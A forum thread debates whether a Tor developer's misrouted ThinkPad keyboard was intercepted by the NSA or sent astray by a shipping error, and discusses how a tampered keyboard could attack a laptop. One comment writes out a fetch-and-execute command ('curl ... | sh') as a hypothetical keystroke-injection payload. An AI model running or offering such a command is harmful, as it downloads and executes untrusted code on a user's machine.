THAT'S RIGHT, it's time for WHICH IS MORE LIKELY?!
[intro music]
Today on Which is More Likely?, we're looking at a replacement Lenovo Thinkpad keyboard that was shipped to Alexandria, Virginia, instead of Seattle, Washington. What a blunder! [slide whistle sound effect]
Now put your thinking caps on and ponder, WHICH IS MORE LIKELY?!
• The largest intelligence agency on the planet, recently outed by Snowden's leaked documents for operating a multi-decade worldwide dragnet that secretly gathered communications on hundreds of millions of people, was too incompetent to have the US Postal Service display tracking information that hides the fact they're modifying a laptop keyboard in order to somehow spy on a Tor developer.
ORRRRRRRRRR!
• The third-party seller who uses Amazon to accept orders screwed up and gave Amazon the wrong tracking number.
That's all we have time for on today's episode of Which is More Likely? Don't change the channel! Up next is a BRAND NEW episode of Godwin's Law and Order! Good night from Hollywood!
Oh, I like this game. Let's play again: WHICH IS MORE LIKELY?!
* The world's largest online retailer that does $54M in sales per day has a bug in its procurement system that randomly transposes tracking codes.
ORRRRRRRR!
* The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.
On the other hand, what's great about your way of putting it is that it juxtaposes your belief in the all encompassing nature of the NSA's programs with your incredulity that such a program might have been applied specifically here. I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that that there's no scenario in which you could be convinced that the NSA did anything.
And yet again, maybe it's time to stop thinking of the NSA as some far-off abstraction and start thinking about it is an actual thing that affects our daily lives.
I don't understand. Richard's point doesn't depend on an Amazon bug that transposes tracking codes. But your point does depend on the NSA redirecting packages to Alexandria in such a way that anyone who checked their order status would notice.
Why do you think NSA cares much about hiding their activities from you?
I can tell you a story. Some years ago, back in Russia, as a [naive] kid, I've developed a surveillance system for Telrad telecom exchange [ultimately for FSB]. Do you think anyone cared to do that project in secrecy? I can give you the answer. Nope.
As far as I understand NSA can legally intercept packages and can legally install undetectable surveillance devices. As long as they are not using collected surveillance data, legally they are fine and they do not absolutely have to hide their activities at all costs. Hiding large scale operation is difficult and plugging every information leak is expensive. So they are not necessarily prioritizing that. So, yes, there is a change that we simply see their activity. And yes, it could be just an Amazon bug.
During the cold war (and shortly after), this type of activity would be exactly what red-blooded Americans would say differentiated us from Russia (not hiding it, but doing it at all). Americans have constitutional protection against unreasonable search and seizure by the government.
These days you could probably drop the country and year and have trouble differentiating tactics used by the US and Russia.
It's going after low-hanging fruit to say this and while the link I'm providing is not the NSA, our government agencies seem to have a real hard time keeping secrets lately.
Part of this discussion seems based on a lack of understanding of the geography of the DC area. Alexandria is near these agencies, omg! But the fact is that there isn't much government in Alexandria. USPTO is there, and otherwise it's charming old houses, quirky shops, crappy strip malls, cookie-cutter suburbia, smallish high-rise apartments, railroad facilities, light industry, and other such similar things.
It's roughly like seeing your Mac get misdelivered to Richmond, CA and deciding that holy crap it's been intercepted by Apple on its way to me.
You're using public sources of information to refute theories of where a highly-secret and officially-denied program might operate. That makes no sense.
Whatever office, department, or contractor does the NSA's package intercepts, all public sources will describe it as something innocent and unrelated.
The guy I responded to is using that some information to try to support the theories. Either the info is good, or it's not.
I have no particular objection to saying, "this stuff would be secret so of course there would be no information on it". Oddly, nobody has actually tried that.
However, that still goes back to the point I raised: why Alexandria? It's not particularly convenient to the NSA. It's not convenient to shippers. It doesn't have anything special in the way of infrastructure. So it would be quite an odd choice. Possible, but it's not the smoking gun the article makes it out to be.
I specifically stated that I was just trying to point out that, despite your claim, there's something interesting in Alexandria.
There's no point in debating speculations beyond that because we don't have any information for or against.
It's just me stating "hey, it's possible" and refuting your suggestion that there isn't anything in Alexandria that could cause concern. I'm only answering a question you asked.
Yes, one part of what they do is in NJ/CA. Alexandria is where they're based. I'm not leaping to any conclusion; it just seems remotely possible and they're based there. You're the one saying there's nothing interesting in Alexandria.
Given what the company researches, their history and mission, it seems like exactly the sort of place where this wild theory suggested by the OP could be a reality.
The headquarters of a company like this isn't interesting. Headquarters are administrative centers. It's not where you send a laptop to have a bug installed.
I'll have to be explicit since this seems hard to understand:
You're the NSA. Who do you trust more:
A) (Perhaps the) CTO of a defense contractor that only works for you that you've had a 20 year working relationship with?
B) The bright eyed young scientists working for that contractor in a building 3000 miles away?
Or put another way, despite the Snowden leak, I'll bet you any amount of money that the NSA is still in "really fucking tight" with Booz Allen Hamilton.
In one paragraph, you seem to be saying that the NSA wouldn't trust the employees of contractors. In the next paragraph, you tell me that the NSA is still "really fucking tight" with Booz Allen. These two ideas seem completely contradictory.
But I think you might be suggesting that the NSA has given up on the low-level employees, and is now having the executives of these companies do the work directly. Which seems completely ludicrous to me, as no C-level at a company like this (even the CTO) is going to have the requisite skills, and even if he did he's not going to have the time.
You think along the narrowest lines of anyone of anyone I've ever held a conversation with.
Not executives specifically but somebody trusted. That's more likely to be in the building where administration is done than anywhere else. Also you want to separate research from implementation. Your narrow refusal to even consider that there might be an interesting place for an agency to ship a laptop component to in Alexandria has taken this exercise way further than it needs to be to demonstrate the point.
What you see of narrow thinking is just complete disagreement on how companies like this are structured.
For example, I live a couple of miles from the headquarters of Exxon Mobil. Yet it's about the last place I'd look if I wanted to find a trustworthy person to drill an oil well or build a gas pipeline.
Also, I'm not refusing to consider that Alexandria might be a viable destination for this. I merely think it's unlikely, especially compared to the "military and intelligence belt" language used in the post.
No one thinks redirection would be visible to 'anyone'. The theory is thhis could be a one-time screw-up, like a redaction failure, revealing a waypoint that was supposed to be secret. (Maybe a label that was supposed to go on the outer box went on the inner box instead?)
I'd agree an innocent screw-up is far more likely, here and in any particular case where something weird happens. Weird stuff happens with shipping all the time.
But since we know shipment interception is part of the NSA toolkit, and the NSA cares about Tor, people aren't crazy to be curious and even paranoid around remote possibilities. And if I were a Tor developer, I might buy all my hardware from store shelves with cash.
No, he's saying that anyone who checked their order status shouldn't notice (by design), but maybe that part of the process failed this time.
Also, that failure might be technical or intentional. As I mentioned on another subthread, it's always possible this was "accidentally" exposed by an employee working at the merchant or postal service. The program would require their cooperation. After all, we first learned about the telco spying because telco employees spoke up.
As for whether it's conceivable that NSA would target a Tor developer? A few months they were spying on our close friends and allies simply because they could. If that same mindset were applied to the intercept program, then this isn't impossible to imagine. Just because the NSA and administration has finally recognized their overreach and has started backpedalling doesn't mean these programs change overnight.
It is difficult to predict NSA actions, but opportunistically putting up inexpensive surveillance on all Tor users and nodes seems like a reasonable thing to do. As a developer she is a Tor user and also probably operates a few Tor nodes [for debugging and testing purposes]. So she would be in that group. I think this is plausible. I doubt that NSA would specifically target a Tor developer in US, without court order, as this would probably be illegal. [Although subverting some Tor developers, especially ones who build Tor binaries would be useful.]
The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.
A few comments:
• This "low-level operative" was a system administrator who used social engineering to obtain other people's authentication credentials and gain access to material to which he wasn't authorized. He wasn't the janitor or some clueless field agent.
• Did Snowden expose operational shortcomings? Absolutely. A lot of the programs that have been publicly revealed through his leaks have been running for over a decade without ever seeing the light of day, though. That tells me these "pervasive operational shortcomings" aren't very pervasive. (If they were, the NSA would be absolute shit at their mission.)
• I don't think Andrea is a "high value target," or at least high value enough to risk compromising whatever method they might use to bug her keyboard. I don't say this to belittle her or her work in any way — she seems to be a skilled programmer/hacker/infosec person. And that's exactly why this whole "the NSA is bugging her keyboard" theory doesn't make any sense.
Let's assume for the sake of argument that the NSA had planned to bug her keyboard, and that keyboard is now sitting in an NSA (or contractor) facility in/near Alexandria, Virginia, waiting for some modification to be made before shipping it back out. But, oops, they screwed up and forgot to fake the USPS tracking information. They know she knows because she tweeted about it. She's also tweeted that she can never trust the keyboard if/when it shows up. Why would they ship her a bugged keyboard at this point? If/when the keyboard shows up, she's probably going to take it apart and share anything interesting she finds with the world. There will be hard evidence.
Even if they hadn't bungled the tracking information in our hypothetical argument, they're risking exposure of the exact methods they use to bug a machine for not much potential gain. (Remember, Andrea's a skilled hacker/programmer. There's a very good chance she'll figure out what's going on and tell the world if she has any inkling that her laptop's been tampered with.)
• The keyboard she ordered fits a ThinkPad T60/T61/T400/T500 (and the equivalent "R" models, plus a few others). Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
• I said that I don't think Andrea is a "high value target," despite her work on Tor, because everything about Tor is open. Anyone can download the code and see exactly how it works. The protocol is well-known. There's no curtain to peek behind and gain strategic information about Tor's workings.
So while I don't reject the argument that the NSA is trying to bug her laptop as impossible, I think it's exceedingly improbable. My money's still on "seller screwed up the tracking number."
I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that that there's no scenario in which you could be convinced that the NSA did anything.
The flip side of this argument, which everyone here seems to be clutching onto and running with, is that if the NSA is capable of it, they're doing it at every available opportunity, even when it doesn't make any sense to.
> Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
This is a joke, right? A keyboard and a keylogger would give you everything you need to root a computer.
My point was that the modified keyboard alone couldn't do it. It's not a FireWire device that can read/write things from/to memory however it pleases, insta-pwning a computer as soon as it's connected (unless something like VT-d is being used to contain DMA transfers). It's not even a USB device that could abuse some poorly written driver to gain access.
If a hypothetical modified keyboard is logging keystrokes, someone has to eventually retrieve it to get the logged data. If it's transmitting keystrokes via radio, someone has to be nearby to capture them and then steal the laptop to get at its (presumably encrypted) data.
Why when a shell is focused? Better to wait until the keyboard has been idle for some time, then send the keystrokes to open a shell, execute the needed commands, and close it afterward.
Here's a fun thought exercise for you, since my first reply didn't spark one. Imagine you're an evil keyboard. What evil could you accomplish? Hint: you don't even need your own radio, the computer's already got one.
"we describe how to tamper with a firmware upgrade
to the Apple Aluminum Keyboard. We describe
how an attacker can subvert an off-the-shelf keyboard by
embedding into the firmware malicious code which allows
a rootkit to survive a clean re-installation of the host
operating system."
DMA via FireWire (or Thunderbolt or similar) allows you to very quickly poke at system memory with a near-zero risk of being detected.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.
I would speculate that they might be interested in submitting a patch that compromises the Tor network in some subtle way that only they can exploit, and doing it in her name. Maybe added on to some other big change she submitted, in the hope that nobody will notice it.
Seems the Tor project is using Git for all of their projects, so doing something like that would probably require pwning whatever system she's creating commits on. I will say that putting a bug or something in her keyboard doesn't seem like a terribly efficient way of doing this.
I don't really think that they're trying to break Tor like this. More of a thought experiment - to figure out the likelihood that this is part of an attempt to break Tor, run through the details of exactly how this would be part of such an attempt. It doesn't sound all that practical when you run though how it would work if it was. If they wanted to do it, you'd think they have better ways then a rather sloppy attempt to intercept a laptop keyboard shipment, if that's actually what this was, instead of an ordinary shipment screw-up.
All good points, and I'd second that Andrea is unlikely to be a "high value target" [BTW, curious, who is building and releasing Tor binaries and Tor dependencies binaries?]. Still, as a developer she is a Tor user and it is possible that NSA opportunistically targets all Tor users. And even if not, I'm still finding it distasteful that NSA can legally intercept post and put up dragnet surveillance. It feels like they are using legal loopholes too. Not fair.
That generated more response than I expected. I actually do agree that, on balance, it's somewhat more likely that it's just a benign glitch; I should have said that. What I was really taking issue with is the dismissiveness with you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
So with less snark: I don't think it's exceedingly improbable at all, and whether ultimately it turns out to be the case or not, smugly guffawing the idea that the NSA may have used a trick like that isn't warranted. They really do intercept people's laptop shipments [1] to plant malware in them. They really do sneak tiny radio transmitters into end-user hardware. They really are trying to get backdoors into communication tools. I'll put it this way: if I worked on the kind of software Andrea works on, I would be seriously alarmed. Would you keep the keyboard?
On some specific points you made:
* That Snowden had access to other people's credentials seems like a serious operational shortcoming to me. The "low-level" part wasn't an attack on Snowden; the point is that a lot of people have that level of access. In general, the US intelligence apparatus makes a lot of well-publicized mistakes; I'm sure they make a great number of more subtle ones.
* On the NSA's shortcomings generally, I think this is actually nicely illustrative. Because a lot of the stuff Snowden revealed were things a lot of credible people already believed, based on things like weird locked server closets in telecom buildings and PRNGs that seemed fishy and pointless and heresay reports of requests for backdoor access to communication tools and so on. There was just little hard evidence before Snowden. And there won't be here either. So this is entirely consistent with the what the NSA was like in those decades where their programs "never saw the light of day".
* I think being a core Tor developer makes her high value target. It's hard to imagine the NSA wanting to subvert all the things it's subverted and not wanting to backdoor Tor. Keylogging her keyboard is a great way to do that, either by compromising her somehow, or by just stealing her credentials. So I don't follow the "it doesn't make any sense" line of thinking.
* That she's now tweeted about certainly makes it unlikely that, if the NSA has it, they'll go through with sending it bugged. But so?
Where I come out on this is that yes, it's probably nothing, but it should be treated with suspicion and carefulness, not laughed off because haha, what, do you think you're in a spy movie or something? Because, basically, we are.
[1] Yes, I know this is just the keyboard. I don't think that's a relevant difference.
What I was really taking issue with is the dismissiveness with you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
I was dismissing the linked blog post as much as the suggestion of NSA involvement. The blog post took a single tweet with a single screenshot, screwed up half the facts ("tracking details for a computer Shepard ordered" — uh, no, it was a used laptop keyboard), sensationalized the other half ("it moved another four times around the military and industrial belt" — uh, no, it moved from IAD to Alexandria), and tacked a pile of rhetorical questions and conjecture on the end.
a couple weeks ago, my wife received an order from Banana Republic that was intended for a recipient in Newfoundland. the correct recipient's name was on the packlist inside the box but they showed it to the wrong person. likewise, my wife's actual offer took a few days longer to arrive, too. I suspect it was simple mistake inn the warehouse where an operator had two boxes, printed waybill stickers for both, and then slapped them on the wrong - already sealed - packages. I bet similar things happen regularly.
Maybe this is Amazon/USPS's shipping version of the warrant canary? If Apple does it...
Imagine that we're not in the US for a second and that this were a journalist? Would your opinion of what happened change?
It would have to be a mis-delivery at least instead of a "wrong tracking number". How likely is it that Amazon would ship something from a CA warehouse and it take more than 2 days to get to Seattle? Also keep in mind that USPS does Saturday delivery.
Also, nice defense of the NSA, but keep in mind this is the same intelligence agency that gave pretty much unfettered document access to independent contractor Systems Administrators.
You are either stupid or subversive. By now we all know Keith Alexander’s view of hackers (socially disabled, semi-autistic kids sitting behind a laptop at 4 a.m. wearing a batman suit and gloves) and his view on technical matters is equal with Comodo’s [2] leader. As for NSA having skilled personnel??? Sure - some of them are skilled - but they don’t take decisions[1]. The stupid guys do (again, K. Alexander is an excellent reference for incompetence add to that that he is a lier[3] and you’ ve got an explosive mix).
NOTE: In “War and Peace” - Tolstoy’s masterpiece - there’s a Russian officer (Prince Andrey IIRC) who realizes the insane tragedy of human history: While the Prussian and Russian army coalition (hundreds of thousands of men, with families and lives left behind…) is about to face the fiercest opponent of their era (Napoleon, is a legend among Russian military officials) the two Generals (Prussian and Russian) are fighting and sabotaging each other about who is going to lead the battle… Until it’s too late. They both get easily crashed, without putting up a fight.
So you can play naive, stupid, stunned or cunning all you like but human history is FULL of stupid people in position of power.
No we did not. This is perhaps the most annoying meme to have come out of the Wikileaks and Snowden disclosures. Nobody working in technology laughed about dragnet surveillance or cryptanalysis capabilities or trojan horses. The 1990s was the era of Clipper and Echelon. People did not assume in the 1990s that the intelligence community was benign or disconnected. All you have to do is read _Applied Cryptography_ to see a sober, expansive concern about NSA surveillance. And Schneier's writing was far more carefully considered than, say, Usenet.
For fuck's sake, the most popular show on television centered on government conspiracies.
The millenials did not invent distrust of the government.
The disdain with which you discard my memories of that time is... interesting.
Invent distrust? Of course not.
However, I and my colleagues (as I recall), at the time just did not take the threat of government surveillance seriously. Did I trust the government? Yes. Yes I did. I'm Dutch. We have a childlike faith in our government. Being spied on by the government was something that happened on the other side of the former Iron Curtain. And in the US. Surely not our very own flattened nook of the world.
And would this surveillance of other governments affect me? Ha! Why would it?
Sure I was naive. And I was hardly alone. Were there more enlightened souls, such as yourself? I'm willing to go out on a limb and trust that there were.
Does that discount my memory of being ridiculed as paranoid for using PGP? Or the times I ridiculed friends and colleagues myself for taking measures against being listened in on? I hope not.
You weren't just naive. You were anomalously naive. It's funny you should mention PGP: the 1990s were the time of the crypto-wars, which were in part sparked by PGP. Remember "this t-shirt is a munition"? You couldn't even sell products with crypto in them without jumping through hoops.
If you had to break the last 20 years into three time periods: (!) "post Snowden", (2) "post-9/11", and (3) "post PGP", sensitivity to government surveillance would rank 1-3-2. The NSA was a bigger deal in the 1990s than it was in the 2000s, even after the AT&T "Room 101" disclosure.
"this t-shirt is ammo" is an American cultural artifact.
there was some support for the projects (the PGP source scanning thing, extra-US hosting of crypto software, ...), but other than that, this was the US being stupidly paranoid as usual.
That "you" couldn't sell products with crypto in them was a great business opportunity for a number of European vendors, by the way.
Enemy of the State, The Simpsons.. even AAA movies like Swordfish.. "The Carnivore program, reading every ISP subscribers email- I did what every federal judge wouldn't do"
Maybe it makes me a looney but I was educated about things like COINTELPRO and TEMPEST before I was a teenager and the idea that a government wouldn't be doing these things is more surprising to me than the leaks that they are.
Well, I made a long, detailed, and reasoned reply to one of the replies to my "lack of tact" post, and it got downvoted to -1. So there you go. Yay HN.
> The third-party seller who uses Amazon to accept orders screwed up and gave Amazon the wrong tracking number.
This should be easy to find out. Check if the tracking number on the website differs from what's printed on the package itself, and if so what the tracking for it looks like.
Yep. But the package hasn't arrived, so all we can do is make wild-assed hand-wavy conjecture. Or something.
Of note, when searching Amazon for "NEW and ORIGINAL IBM Lenovo Thinkpad Keyboard 42T3209 42T3177", I find one seller ("u fix it", who "Ships from TN") selling that item. Assuming that's the seller Andrea bought the keyboard from, that clearly doesn't jive with the tracking information, which shows the item shipping from California.
You are asking which is more likely. I.e. is the probability of compromise higher than 50% ?
I'd say the the probability is less than that. But I think even risks with lower than half probability are worth worrying about.
The obvious explanation here is that the USPS fucked up. As the tweet says, you'd think the NSA program would be more subtle. Further, there isn't much in the way of intelligence presence in Alexandria. So what's more likely: that the NSA does this program in a secret location that's still right next to all the non-secret stuff, and they can't cover up the tracking data, or that the USPS accidentally sent a package to the wrong place?
Edit: I want to emphasize how incredibly stupid the article is when analyzing the tracking data. Key quote:
"From Dulles, it moved another four times around the military and intelligence belt in suburban Washington DC, finally landing in Alexandria at 11:03 am on January 23."
First of all, there is nothing significant to Dulles. It's the largest airport in the area, and this makes it the arrival point for any packages coming in by air. 90% of my packages have a "Dulles, VA" tracking entry on them by the time they get to me.
Second, it didn't move "four times". It went from Dulles to a carrier facility in Alexandria, then it went out for delivery and got delivered. That's two moves. And how many times do you expect it to move? That's how air-based package delivery works. It goes to an airport. Then it goes to a local sorting facility. Then it goes out for delivery.
Third, the phrase "military and intelligence belt" is ridiculous. Especially so when the only two locations involved are Dulles and Alexandria, neither of which has much in the way of either military nor intelligence.
The article tries way too hard to make its case, and uses a great deal of purple prose to state what comes down to, "the package got delivered to Alexandria, VA which is close to a lot of government agencies". That would actually be more convincing than the insanity they wrote, although still not very convincing. But at least it would be honest.
At this point aren't we all just guessing? Reading this thread I'm surprised how strongly many folks I respect (like you - viva FQ&A!) are insisting this could not be an NSA screw up. The truth is we don't know, so why rush to conclusions (even benign conclusions) instead of waiting to learn more?
And imagine if you were Andrea and you develop software that dissidents around the world depend on with their life, while also knowing the NSA has simultaneously tried to weaken it. If the laptop does get rerouted to her with an apology from USPS and you were her, are you saying you wouldn't hesitate even a little before accepting it and transferring your data onto it?
Ultimately, I think that's the real story here. The biggest problem with having a government that watches its citizens isn't the watching per se, it's the loss of trust.
And I think you misunderstand. I am not arguing that it "could not be" the NSA. And I haven't see anyone say that. I am simply arguing that it is extremely unlikely.
It's a guess, yes, but it's an informed guess. It's a matter of looking at probabilities and seeing what's more likely. Shippers screw up all the time. Packages make crazy detours because somebody tossed a box in the wrong truck. A label falls off and a mixup occurs. Somebody typos a tracking number.
On the other hand, for this to be the NSA, several unlikely things would have to be true:
1. The NSA would need to be intercepting computer equipment destined for certain people and modifying it to spy on them.
2. The NSA would need to be targeting the person in question for this program.
3. The NSA would need to have set up this program in such a boneheaded way that it shows up on a package tracker. (If I were in charge of this program, I'd just set it up in FedEx's sorting facility in Memphis and then ensure all the relevant equipment uses FedEx. Simple, fast, and no chance of the target finding out.)
4. The NSA would need to have set up this program in Alexandria, even though it has little to recommend it for such a thing.
Now, we know that #1 is actually true. So that's one requirement fulfilled, out of several. But what about the rest?
I'm somewhat skeptical on #2. It's possible, but it seems unlikely. Why would the NSA target Tor developers? The security of Tor falls apart in the presence of an adversary that is able to monitor the entire internet, because you can just correlate traffic that enters with traffic that exits. The NSA can presumably monitor enough of the internet to defeat Tor right now. So why bother spying on Tor developers? It's possible as a belt-and-suspenders maneuver, but this person just doesn't strike me as a likely target.
I'm really skeptical on #3. It's about as believable as having the FBI spy on me by parking a van outside my house that says "Flowers By Irene". It's possible, but really unlikely.
And #4 doesn't make a whole lot of sense to me. Again, possible, but unlikely.
So we have one thing that's true, and then several other things that are individually unlikely, and combine to be really unlikely. It looks to me that people are committing the basic fallacy of thinking that the truth of #1, since it's unlikely, somehow makes the rest more likely too.
It comes down to this: is it a screwup by USPS or Amazon or a third-party reseller, or is it the NSA screwing up royally while trying to plant a bug? In the absence of evidence, we are stuck guessing, but we can guess intelligently by realizing that one is vastly more likely than the others.
"When you hear hoofbeats, think of horses not zebras."
That doesn't mean zebras are impossible. But it means you should prefer the more obvious explanation unless there's evidence to the contrary.
Fair enough, and thanks for the thoughtful reply. I didn't mean to misrepresent your position -- I took "The obvious explanation here is that the USPS fucked up" to mean you belived it couldn't be otherwise, rather than when weighing the evidence the more obvious [simpler] explanation is that USPS screwed up.
Like you, I'm also a big proponent of Occam's razor. (Having been a med student, you don't know how many times I heard that "think horses not zebras" analogy from attendings.) I guess it just comes down to the degree of faith each of us has in the NSA and their corporate partners. Some of us are more willing to doubt their actions and/or believe it's possible they could screw up this way. But at this point we can only wait and see if we learn anything more in the coming days -- though probably not. One would hope the NSA is competent enough to cover this up, even if it was their screw up.
Added: BTW, there is another explanation that no one has mentioned. Leaving the Alexandria issue aside, the NSA interception program obviously relies on participation from one or more corporate partners. And just as we've seen at the telcos, it's reasonable to assume that there are staff at those partners who aren't particularly enthusiastic about the program. So it's possible someone decided to "accidentally" bypass/skip an important step that would have obscured this. It's not a huge leap to imagine a motivated techie realizing that this particular delivery would be an ideal opportunity to direct a lot of attention to the interception program -- if they felt compelled to take the risk. I'm definitely not saying this is the (or even a) likely possibility, but it's probably the only way we'll ever know if it was in fact the NSA.
Would you care to refute that instead of just shouting? Like, point out something that contradicts it? Because I can't think of any, and I lived in Alexandria for seven years.
When I read the headline, and the comments here before reading the article, I was expecting to see tracking data that went from the seller to the buyer with a mysterious stop near the NSA.
Then I read the article. The tacking data shows a delivery to a destination near the NSA.
Does anyone here seriously think that the mechanism the NSA uses if they want to tamper with a laptop on the way to simply change the destination address to be the NSA? And that no one has noticed this before?
If they are intercepting and modifying domestic shipments, the mechanism would be something that is executed AT the shipping carrier facilities or possibly during the final delivery, and would be completely transparent to outside observers, including both the sender and the receiver of the package.
Watch the "Modern Marvels" episode on package delivery for a look at how the automated package movement systems work at the major hubs, and you'll see how a package could be diverted for special treatment and then re-inserted into the system transparently, with most workers at the facility having no idea something special is going on.
The best chance at detecting this from outside would probably be to look at next day delivery orders on items that would be the most time consuming to modify, to see if those are more likely to miss their delivery deadline. The idea is that with such a tight schedule, the chances are higher than an interception will blow the delivery schedule. For items ordered with two day or longer shipment, the delay in modifying the item could be made up by upgrading it to one day delivery in the system when it is re-inserted. That's why observing one day delivery items is the best bet.
>Does anyone here seriously think that the mechanism the NSA uses if they want to tamper with a laptop on the way to simply change the destination address to be the NSA? And that no one has noticed this before?
No that doesn't pass the giggle test. If it has anything at all to do with the NSA, it's a blunder.
I believe it was season 5, episode 1, "Deliver It". They focus on UPS but things would be similar for other carriers. The UPS part starts about 9 minutes in. If you have Amazon Prime, they have it for free streaming.
BTW, UPS would be particularly good for intercepts, because UPS operates an electronics repair facility that does factory authorized repairs. When you think you are sending your broken laptop by UPS to, say, Toshiba, it can get automatically diverted to the UPS repair facility a couple miles from the hub, where Toshiba-trained technicians do the repair.
This means that a laptop shipment being diversion for the NSA would not even have to be done with some secret diverter on the line somewhere. They could just make it look like an ordinary repair job. The repair facility is large. Who would know if one or two of the repair technicians are really NSA agents?
As much as I'd like to believe that they did mess up the interception reporting (if they really do interception like that), I've seen enough crazy tracking reports that I wouldn't be surprised if it was just a stupid mistake.
Just googling for "funny delivery tracking route" for example will give you things like:
ITT, people who have never been to DC. Dulles is one of the main airports everything flys into for DC. As for as I know, it is the biggest.
Dulles has a lot of government contractors and big companies in the area, but that's about it.
What would be suspicious is if it went from Dulles to Langley, from Langley to Ft. Meade, from Ft. Meade to Quantico, and from Quantico to Alexandria....but Dulles to Alexandria is really standard.
edit: It isn't like it got back on a plane and went back to Seattle to be delivered to this girl. It looks like they straight delivered it to the wrong city. The government has pretty good OpSec when it comes to things like this. You think they would straight up route her package through Ft. Meade if they were planning to install malware on her computer?
Yep, the last few lines of the package tracking could have come from about 90% of the packages I had delivered to my house in the past few years, until I moved out of Alexandria.
The keyboard can be modified, for example, with SURLYSPAWN, a 'Keystroke monitor technology that can be used on remote computers that are not internet connected'. It's probably one of the most used NSA devices, being cheap($30) and easily installable.
Worse: laptop keyboards are usually connected to a special embedded firmware (IIRC on my Clevo laptop it's called EC, short for embedded controller), which handles the FN+x key combos like LCD brightness, volume control, keyboard backlight (Lenovo!), WiFi/BT/cellphone-data connectivity, webcam enabling (!) and other detailed functions.
Now, if this EC chip is vulnerable, a malicious keyboard can have direct DMA access (just like FireWire controllers, EC is usually connected to the main PCI bus)... no need for drivers here.
As per my other post, the keyboard is most likely a PS2 keyboard interface (physical or emulated) connected to a simple PS2/LPC(ISA) bus interface inside the EC. It will literally deliver an IRQ to that bus (IRQ 1) at which point the EC has to suck down a character from the keyboard buffer and do something with it.
It's not clever, can't use DMA and generally is the dumbest thing in the entire machine.
If they somehow manage to work around it I'd eat a box of lightbulbs. It's hard enough to coerce it to work to start with.
Source: I used to design embedded PC kit from the board level.
But one question remains: how does the EC control stuff like the bluetooth radio and webcams? They're USB devices to the OS, so in theory there should be a USB hub inside the EC?
Not necessarily. It may only have power control function. If you pull a USB device out it's the same as turning it off in theory and vice versa. It's probably just turning the device off or setting it into standby mode.
edit to add: some Intel south bridges have integrated EC which makes things a little uncertain.
Laptop keyboards are directly connected to embedded controller primarily because they are completely passive switch matrices (and EC includes - often directly in hardware - logic for scanning keyboard matrix), so there is nothing meaningful to exploit on the EC side.
Also connecting EC directly to some PCI bus does not make much sense from both system design and cost perspectives. Usual place to connect EC to is LPC, which is explicitly designed for such devices (things on motherboard like serial/parallel/game ports, TPM, FDC, keyboard controller/EC, BIOS flash and various ). Random review of datasheets found by google seems to indicate that chips that are only embedded controllers and do not contain additional ISA based peripherals (like ISA DMA controller itself) tend to not even implement the pin required for LPC DMA/bus master transactions (as it is not required for anything in normal operation).
I don't believe HIDs have the ability to install arbitrary drivers. Windows will try to identify the device and locate the driver via Windows Update, or use a generic HID driver. Or the OEM may have preinstalled drivers.
In any case, a malicious keyboard can simulate keypresses and pwn your machine that way. No evil driver needed.
Actually no. The keyboard is still an old fashioned PS2 device on the majority of laptops. It connects to the LPC bus (low pin count - similar to ISA) via a PS2/ISA bridge in the embedded controller. It's just like in an oooooold AT PC. There is no possibility for it to deliver anything but keystrokes. It doesn't go anywhere near the USB stack and can't inject devices or play with the HID drivers.
Keystrokes can be dangerous on their own but engineering a solution to this that assumes the correct state of the machine and can operate software is unlikely simply due to the margin of error.
It's possible, but there is no evidence suggesting that is what happened here.
The overwhelming likelihood is that the package simply took an unusual route due to factors that are unknown to us. For this story to be true, it would require a level of incompetence that is orders of magnitude beyond that which we have previously seen from the NSA.
It fits. The answer is almost certainly No (an honest mistake is far more likely, and nefarious activity wouldn't look like this anyway), and you can tell from the way they write (e.g. vastly exaggerating the import of the tracking info) that they deeply want this to be true.
I give it about 50/50 odds that a followup article shows up along the lines of, "they received the laptop and the tracking info for this package shows it coming straight from the warehouse nearby and this is clearly evidence that the NSA is screwing with USPS tracking data."
I hope this was not posted before the keyboard arrived. Should be easy enough to have it taken apart by an expert and see if anything is fishy (and to check if tracking numbers match).
All this speculation about what any TLA's may or may not have done seems fruitless to me. If the keyboard seems legitimately suspect, send it to someone to do a teardown or plug it in and capture communications, and find out. That way we'll learn something concrete, and not reinforce this 'NSA of doooooom' crowd mentality.
Apparently, they do. Until Snowden releases something along the lines of "List with 1.500 gadgets that Amazon released that were bugged". Then suddenly we'll be like "Oh Jeez, I thought but it but I never really believed...".
The thing is "Would the NSA wanna bug a TOR developer's computer"? and the answer is "Damn, sure!".
So it's not as far fetched as many here believe imho - and NO there are not many better ways than this, I can't think of any.
Exactly. This is why many people in tech weren't that surprised by Snowden's leaks and were slightly relieved just to see all the suspicions verified. But most people seem to need a powerpoint explicitly stating what's going on before they believe it. Prior leaks from NSA defectors without hard proof had almost no recognition by the public. Even full in-depth exclusives from Washington Post didn't seem to affect people.
I'm inclined to believe that this is a mistake - "extraordinary claims require extraordinary evidence" and all that.
...However, since hypothetically this could happen, how could it be prevented? Would there be some unbreakable way for a manufacturer to tell you if the keyboard had been tampered with?
